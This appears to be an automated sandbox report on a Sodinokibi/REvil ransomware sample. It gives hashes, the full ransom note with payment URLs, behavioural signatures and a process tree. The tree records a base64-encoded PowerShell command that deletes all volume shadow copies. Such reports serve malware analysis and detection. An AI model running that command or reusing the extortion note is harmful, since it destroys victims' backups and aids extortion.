Analysis

  • max time kernel
    107s
  • max time network
    107s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    13-04-2020 20:54

General

  • Target

    3685CE874B1ABEF3448D4C50EA0371E31A78AFBAE09287D3FF5D25953091659C.exe

  • Size

    231KB

  • MD5

    2fbaf37aad337e407fe8ea80cc3ab763

  • SHA1

    098234f0f7a009728f38e91153abc34d87c18795

  • SHA256

    3685ce874b1abef3448d4c50ea0371e31a78afbae09287d3ff5d25953091659c

  • SHA512

    a1f84ac10370f7a0ce8202a5c9f511faec84f405e4ba1dacd6e7bf851a49a1228b8f70f680c3106982834d326aab3a4f13a86406be65ecc753da486be003450d

Malware Config

Extracted

Path

C:\15u463-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 15u463. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/36B564197A3EF9EC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/36B564197A3EF9EC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: K0/ELgLTdKQRDYg6kJZWEZL5/btpWvih0gPFXPeQp3EQSuiKSjimoD9XFJ4F9TLf awGpfFtC3861mqYPq6yeDwJOPKPurbdCkwdUXTjlTlFw4pka3tg4DZ2jqei+Ch1Y t7QYkRgu+3Ml2fBp29VGj0BZHxnCAYtJ1g6et9x33ukQyWzmt1CkkLOji7X2kSL/ ozVXq/mwzY6MwNERniN6Ul6fNvnZRh6waHATIPRH7qOOId2kdJuCrW/B4dmq/+TF nHwcJdp4fEf50PMRjUVlAleEneQQDS7861ll+XgTuKSgagjo659s31axir36IDIG Xq2XJZlM6E2hC5hF6oBSuOX/sJqtL0HuUya1FgWCfIT8LHbLJKbOcmF4lAELSznj YL56d6j/DdD+qLaacBBnzjblFKMoRbfeCLKQCHTV0biZRG4qoP8GsFl4NeRYsgwR VOM/zzLOXHrdq5aXdaoft/IMgyLDd6cx8HRJikY8AN94Keq+3Ps8NfgTr+gILpO/ ncGQZwC1HyMTOxdxkLRfGHK6kpJ1yCKC68Ekpq4Pk0KWsTo288vTzJoO6v1Q5WOk eWVyQUUNQoU46aRF9LBhTMXR6M9t6yS4CHfhgzWTcjCymeQo83R5is1lH/+Sr5O5 qMYyLbbCSn35o8YVHB6lqLRRZaT+WAbMqIfKQiXiM2TvpXlTCCususGXtneR2dy/ 6b5IHcYi4e4soyYvdcQ+hdHAhM9Y8HDyY0MV69Hqvcha0IC3GTwmU+ePzJgUxTkY OhnUu/D4VjWWof8rQDZYtEPv3G15XlaHjx+K577TvvYYN1IEUTTNUYS80Di2tHbu /5OojRe2h1lzcm2micIFfhLE8sMPszclvILth2G5JfJkFibtad0sc2rkkEEkqGa6 +83CnG7VP7aQ2jXcNxkzoOCNVHykK+1Tf4i5hMefJbag+IK2wgwC6cDqP0bGBdII 6i+NaodKyVIqArBycMYANZlnAFPtMhOqHq1aH5eMScZhe9tdK5jqCca8A2aQ0Zou 58WAQuqe4aG9xBLCv4oAmRRtjBtJbVHMwPF87S0aUL3XvYx2ohn/RC7hLM7aBcSL lPOErtcw17TIc6uiNu6y2ipio+GmjbgE9WHrS/EQGWaYtAhxnvmJYWIb3OQY/xWY +1hHcagNq58gAgL16jrIR98U/5n5e1GVxD6ErUmJJaTDuTG1XmzuuRbAKjDTQ3Ph NgBQx/R6dfqkjQASuiKFX57gbxMgDlvs08Iqtu9kzi5Hy9tQuGcZMssq/cqdjPkK aYbyNDTAdaPdECkSmz921ZKbV7ZTBtbVkr0AbJUasd0= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/36B564197A3EF9EC

http://decryptor.cc/36B564197A3EF9EC

Signatures

  • Modifies service 2 TTPs 5 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Discovering connected drives 3 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3685CE874B1ABEF3448D4C50EA0371E31A78AFBAE09287D3FF5D25953091659C.exe
    "C:\Users\Admin\AppData\Local\Temp\3685CE874B1ABEF3448D4C50EA0371E31A78AFBAE09287D3FF5D25953091659C.exe"
    1⤵
    • Drops file in Program Files directory
    • Sets desktop wallpaper using registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:2024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Discovering connected drives
      PID:824
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:816
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:748

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads